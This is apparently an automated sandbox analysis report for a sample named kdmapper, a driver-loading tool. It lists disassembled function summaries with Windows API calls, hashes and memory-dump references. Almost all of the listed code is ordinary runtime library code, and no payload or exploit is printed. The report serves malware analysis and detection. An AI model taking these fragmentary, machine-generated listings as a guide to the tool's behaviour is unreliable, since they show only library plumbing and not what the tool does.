Instruction Fuzzy Hash: 4711C230910B34EBDF209F24E8046AA37ABFB82761F148929F466C5390D7788E44DF71

Function 0064AD34 Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0062D710,00000000,00000000,?,0064ACDB,0062D710,00000000,00000000,00000000,?,0064AED8,00000006,FlsSetValue), ref: 0064AD66
GetLastError.KERNEL32(?,0064ACDB,0062D710,00000000,00000000,00000000,?,0064AED8,00000006,FlsSetValue,00657970,FlsSetValue,00000000,00000364,?,006498B7), ref: 0064AD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0064ACDB,0062D710,00000000,00000000,00000000,?,0064AED8,00000006,FlsSetValue,00657970,FlsSetValue,00000000), ref: 0064AD80

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 3b5e144aec8c039bce62bb079829ec168ca9993ceed1c783a8ffac3c3bd042a6
Instruction ID: 1c62457221dcdad5f7bf88a50aa9df27f1956c6c3da59994a38795aaa9c17040
Opcode Fuzzy Hash: 3b5e144aec8c039bce62bb079829ec168ca9993ceed1c783a8ffac3c3bd042a6
Instruction Fuzzy Hash: AA01F736A81332BBC7228BA89C54A977B5BEF45BB3B111624F916D3790D720D90186E1

Function 0064BA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 006497E5: GetLastError.KERNEL32(?,00661030,00644674,00661030,?,?,00643F73,00000050,?,00661030,00000200), ref: 006497E9
Part of subcall function 006497E5: _free.LIBCMT ref: 0064981C
Part of subcall function 006497E5: SetLastError.KERNEL32(00000000,?,00661030,00000200), ref: 0064985D
Part of subcall function 006497E5: _abort.LIBCMT ref: 00649863

Part of subcall function 0064BB4E: _abort.LIBCMT ref: 0064BB80
Part of subcall function 0064BB4E: _free.LIBCMT ref: 0064BBB4

Part of subcall function 0064B7BB: GetOEMCP.KERNEL32(00000000,?,?,0064BA44,?), ref: 0064B7E6

_free.LIBCMT ref: 0064BA9F
_free.LIBCMT ref: 0064BAD5

Strings

pe, xrefs: 0064BAC9

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID: pe
API String ID: 2991157371-324909747
Opcode ID: 16b3f14d49c1771ee0cff95a37adeb6123f3789623f76c8ed70f1a5841f96a42
Instruction ID: 60c93bb5a80001a80b905e9934adb9f8659bf2d5cc74b61d280cc3d3a34c710e
Opcode Fuzzy Hash: 16b3f14d49c1771ee0cff95a37adeb6123f3789623f76c8ed70f1a5841f96a42
Instruction Fuzzy Hash: B331B131904209AFDB14EFA8D441B9EB7E7EF40320F21549DE9049B2A2EB329E81DB54

Function 0063E532 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E51F

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

2c, xrefs: 0063E532
(c, xrefs: 0063E519

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: (c$2c
API String ID: 1269201914-1934866258
Opcode ID: 94706256e87af5558d1fbb4e3f3372ce9edce69b4e57012ab72f9ad990aca067
Instruction ID: 67cd0f8a411ec80a8d01bdee073ae741db332fe53e776ad2a7c2d6ea260ea7c0
Opcode Fuzzy Hash: 94706256e87af5558d1fbb4e3f3372ce9edce69b4e57012ab72f9ad990aca067
Instruction Fuzzy Hash: 0DB012C1698500BD314465481C02D3B050FC0C1F35B30412EF805C01C0E8420D4505B1

Function 00629F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,0062D343,00000001,?,?,?,00000000,0063551D,?,?,?), ref: 00629F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0063551D,?,?,?,?,?,00634FC7,?), ref: 00629FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0062D343,00000001,?,?), ref: 0062A011

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 755c51f4aaf543d0745962dc89ae59e5b5be16765e1f5db8564a06160ebe4625
Instruction ID: 57b05acddf4a6ff86ea23f543e284bb63c4a31f6ca352c03c6c2fb261928e6cc
Opcode Fuzzy Hash: 755c51f4aaf543d0745962dc89ae59e5b5be16765e1f5db8564a06160ebe4625
Instruction Fuzzy Hash: 7031A031208725AFDB14CF20E918BAEB7A7EB84B55F04491DF5819B390C775AD48CFA2

Function 0062A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 0062C27E: _wcslen.LIBCMT ref: 0062C284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0062A175,?,00000001,00000000,?,?), ref: 0062A2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0062A175,?,00000001,00000000,?,?), ref: 0062A30C
GetLastError.KERNEL32(?,?,?,?,0062A175,?,00000001,00000000,?,?), ref: 0062A329

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: 57c44e34b8fe87c8a70e246953eb84633838baf7379c1db78a916ef48adec128
Instruction ID: ca6bfe7c9ee9969cce0b5c2cc94ad6eb6763c0202f1d4de683bc773537946a9b
Opcode Fuzzy Hash: 57c44e34b8fe87c8a70e246953eb84633838baf7379c1db78a916ef48adec128
Instruction Fuzzy Hash: DC019231101B30ABEF21EAF56D09BED224A9F09781F044458F901E6281DB94DA818EB6

Function 0064B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0064B8B8

Strings

, xrefs: 0064B8FD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 46f3502b8baabc08a4bd5dc68cae85cb803ec0103edaa0e771b943e97dcee3c0
Instruction ID: 8e458692cc8dd19834fad18865c9ab6d4cdd8b53418d4c13eeebebeee8479194
Opcode Fuzzy Hash: 46f3502b8baabc08a4bd5dc68cae85cb803ec0103edaa0e771b943e97dcee3c0
Instruction Fuzzy Hash: AD41C87090439CAEDB218E64CC84BE6BBABEB56304F1414EDE59A86242D335DA45DF60

Function 0064AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0064AFDD

Strings

LCMapStringEx, xrefs: 0064AF7D, 0064AF87

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: a2a37a114e95782fdcccda765b6466f3de201a79690815117d8acba7268a8533
Instruction ID: d3cf8d80be18fb52c0877299c5c88031856ab5907301ed35ab1b19a313a7386a
Opcode Fuzzy Hash: a2a37a114e95782fdcccda765b6466f3de201a79690815117d8acba7268a8533
Instruction Fuzzy Hash: A6014832544219BBCF029F90EC02DEE7F67EF08751F014158FE1826260CA328A31EB91

Function 0064AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0064A56F), ref: 0064AF55

Strings

InitializeCriticalSectionEx, xrefs: 0064AF1B, 0064AF25

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 5634e93ac9fc9215c40bb64b676f3426ddc35797677f054cf0c7b48e2303a126
Instruction ID: c3ac732f4239a2128ce937c0d148dab39b67c1a018a667f83f61329996ee598d
Opcode Fuzzy Hash: 5634e93ac9fc9215c40bb64b676f3426ddc35797677f054cf0c7b48e2303a126
Instruction Fuzzy Hash: C0F0B431A85218BBCF129F50DC02C9DBF63EF04B52F014058FC0956260DA315E14DB95

Function 0064ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0064ADEE

Strings

FlsAlloc, xrefs: 0064ADC0, 0064ADCA

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: ad5e0444b30bdc65d86bf7750a88316c7087f3ca7ff27412068a1fa87b087db2
Instruction ID: 5e2c11a7fa3a443cbf7fd73132584e3d747a9de233074f4b0dc03ea84db1ba5b
Opcode Fuzzy Hash: ad5e0444b30bdc65d86bf7750a88316c7087f3ca7ff27412068a1fa87b087db2
Instruction Fuzzy Hash: 13E0E531A85318BBC711EBA5EC0296EBB57DF04B22F020199FC0597340CD715F4196EA

Function 0063E1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

c, xrefs: 0063E1DD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: c
API String ID: 1269201914-1230825448
Opcode ID: 2f21c3c08c6ded9105466be6cd23036d2b2fc669850db592383d6e909f6007c0
Instruction ID: 253fd0a035e4182431cdd9cee52141fdd3f44931ad048532763fd0470309a7b8
Opcode Fuzzy Hash: 2f21c3c08c6ded9105466be6cd23036d2b2fc669850db592383d6e909f6007c0
Instruction Fuzzy Hash: ACB012E925C201EC714461891C06C37010FC4C0F21B30413EFC06C01C0F8516C0506B1

Function 0063E1F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

c, xrefs: 0063E1DD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: c
API String ID: 1269201914-1230825448
Opcode ID: dbe3841494251c9f5a12820487c6d0a6eed74e49f6be7d52cbda8e62ae83f44f
Instruction ID: 944fad6cc1a4ff88afd5f45f08ec2d30157ff8b814ee5155997126282a8666e7
Opcode Fuzzy Hash: dbe3841494251c9f5a12820487c6d0a6eed74e49f6be7d52cbda8e62ae83f44f
Instruction Fuzzy Hash: 33B012D5258101EC314466451C06C37010FC4C1F21B30C13EFC06C02C0E851AC0906B1

Function 0063E1D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

c, xrefs: 0063E1DD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: c
API String ID: 1269201914-1230825448
Opcode ID: 70ad7a69acfa4c9345d500b4bee305a04980de1ae3e50b5540aa9142d8988c3d
Instruction ID: 2d708a65183866c18c2707abfcab41f91b1bd50fa52bb2426685e2732a32b885
Opcode Fuzzy Hash: 70ad7a69acfa4c9345d500b4bee305a04980de1ae3e50b5540aa9142d8988c3d
Instruction Fuzzy Hash: F8B012E9258201FC310421851C06C37010FC4C1F21B30853EFC02C04C0F851AC0504B1

Function 0063E264 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

c, xrefs: 0063E1DD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: c
API String ID: 1269201914-1230825448
Opcode ID: 66b08d11799adcf53f60caa791c958e68eb338223e2618552f42aa446691568a
Instruction ID: 905804acdf3431815e4b0e273919df47dfe2591b829dffbca5180926ff5f61bc
Opcode Fuzzy Hash: 66b08d11799adcf53f60caa791c958e68eb338223e2618552f42aa446691568a
Instruction Fuzzy Hash: 6DB012D5269141EC314461851C06C37014FC8C0F21F30413EFC07C01C0E8516C0505B1

Function 0063E26E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

c, xrefs: 0063E1DD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: c
API String ID: 1269201914-1230825448
Opcode ID: 28646c81d8ad81a5512ed5942f03c4804d4b3b634b947bce5a3988873fa751e5
Instruction ID: 3f0d67255a6fd47fbb47d356a9e3a7068d117c757edc5df1eacfff127f387c5e
Opcode Fuzzy Hash: 28646c81d8ad81a5512ed5942f03c4804d4b3b634b947bce5a3988873fa751e5
Instruction Fuzzy Hash: F5B012D5258101EC3144A1551D06C37014FC4C6F21B30813EFC06C01C0E851AC0505B1

Function 0063E246 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

c, xrefs: 0063E1DD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: c
API String ID: 1269201914-1230825448
Opcode ID: 9758032c5e37f87d3e8703b2f4631e2636bf9b444792aad902fe8232bd517540
Instruction ID: ba23957c32334607ac6c5684fd210e29d7a28012790595578ff0df87ad0516c7
Opcode Fuzzy Hash: 9758032c5e37f87d3e8703b2f4631e2636bf9b444792aad902fe8232bd517540
Instruction Fuzzy Hash: 00B012D5259141EC314461451C06C37010FC4C1F21F30813EFC06C01C0E851AC0505B1

Function 0063E250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

c, xrefs: 0063E1DD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: c
API String ID: 1269201914-1230825448
Opcode ID: ab499ef87bdad258fcd5305aa6ecffdf79a23f67b0cc521bfa178aa66063917d
Instruction ID: bddab4c8fe04095f4262c9d24343e5fb8fcfb29d6ad7323e0852e29544e0bd52
Opcode Fuzzy Hash: ab499ef87bdad258fcd5305aa6ecffdf79a23f67b0cc521bfa178aa66063917d
Instruction Fuzzy Hash: F8B012E5259241FC318462455C06C37010FC4C0F21F30423EFC06C01C0E8516C4906B1

Function 0063E228 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

c, xrefs: 0063E1DD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

